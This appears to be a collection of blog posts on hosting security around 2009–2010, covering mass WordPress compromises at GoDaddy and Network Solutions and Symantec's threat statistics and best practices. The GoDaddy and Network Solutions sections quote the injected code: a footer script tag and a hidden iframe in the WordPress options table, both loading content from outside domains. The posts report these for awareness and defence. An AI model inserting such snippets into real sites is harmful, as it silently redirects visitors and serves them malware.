Shared Server Blogs Hacked En Mass At Godaddy

Google’s Online Security Blog (August 2009):

Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.

Another disturbing trend is many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.

But still… that’s a lot of malicious code and a lot of websites.

And just last weekend, Wordpress blogs hosted at Godaddy were hit with an interesting exploit that was not immediately detectable. Seems the malicious executable only kicked-in when traffic was referred from Google. So that made the exploit less obvious.

The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.

In the view source mode, there was a script src redirect just above the </body> tag in all the .php files. And the infected website will redirect to “burnvirusnow34.xorg.pl.”

But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog’s world.

However it is not known how the hackers are accessing the hosting accounts.

Of course Godaddy has issued a statement regarding shared hosting security measures. But they have also stated, “The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.”

Then they make standard comments alluding to your responsibilities as a website owner.

“The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”

A blogger posted the following at Wordpress’s site regarding last weekends Godaddy assault.

“My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

<script src=”http://cechirecom.com/js.php”></script>

I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.”

Internet Security - What You Can Do To Protect Your Business

Symantec’s release of their Internet Security Threat Report reveals that in 2009, the greatest contributors for security threats were related to poor patches for existing security flaws.

Last year saw an increase in amount of malware created, as well as an ever-increasing level of sophistication and attack automation.

Surprisingly, the country with the greatest percentage of origins of attacks is the US.

Rank    Country            Percentage

1        United States    34%
2        China                 7%
3        Brazil                  4%
4        U Kingdom        4%
5        Russia               4%
6        Germany            4%
7        India                   3%
8        Italy                     2%
9        Netherlands      2%
10      France                2%

Top countries of origin for Web-based attacks  Source: Symantec

Web based attacks seem to be the flavor du jour for the criminal elements. But interestingly, PDF-based download exploits increased from 11% in 2008, to 49% in 2009. The old warhorse, Internet Explorer, is still taking a beating as the second most attacked application, weighing-in at 18% of web-based hostility in 2009. Some things never end.

However, it’s important to note that browser exploits are definitely a preference among hackers.

Mozilla Fire Fox saw the greatest increase in new vulnerabilities, in 2009, with 169. Safari had 94 new vulnerabilities in 2009; Internet Explorer had 45; Chrome with 41 and Opera had 25.

The United States likes being number one, and it occupies that spot in several categories, unfortunately, in this report.

In 2009, the US ranked number one for:

1. Overall malicious activity.
2. Sub-category: Malicious code
3. Phishing hosts.
4. Bots
5. Origin of attack

And the US led the way with 19% of all malicious activity. The number two country, China, came in at a distant 8%.

Here are several security best practices guidelines quoted from Symantec:

• Employ defense-in-depth strategies, which emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single-point failures in any specific technology or protection method.
This should include the deployment of regularly updated antivirus, firewalls, intrusion detection, and intrusion protection systems on client systems. Using a firewall can also prevent threats that send information back to the attacker from opening a communication channel.

• Administrators should update antivirus definitions regularly to protect against the high quantity of new malicious code threats and ensure that all desktop, laptop, and server computers are updated with all necessary security patches from their operating system vendor. IDS, IPS, and other behavior-blocking technologies should also be employed to prevent compromise by new threats.

• Always keep patch levels up to date, especially on computers that host public services and applications— such as HTTP , FTP, SMTP, and DNS servers—and that are accessible through a firewall or placed in a DMZ.

• Perform both ingress and egress filtering on all network traffic to ensure that malicious activity and unauthorized communications are not taking place.

• Consider using domain-level or email authentication in order to verify the actual origin of an email message to protect against phishers who are spoofing email domains.

• Configure mail servers to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif, and .scr files.

Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a mass infection of Wordpress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions it seemed unrelated to themes or plugins, and some employed WP-admin access blocked to all but a few selected IP’s via htpasswd, as well. The sole similarity was all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or larger issues within Network Solution databases, for the following reasons:

No files were created so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp-option table to point to a particular url. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs including Word Press and Joomla. These sites are being infected with iframe injections and encoded Javascript plus PDF exploits installed on certain sites. The encoded Javascript makes it possible for the iframe injection.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed-up in their databases.

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.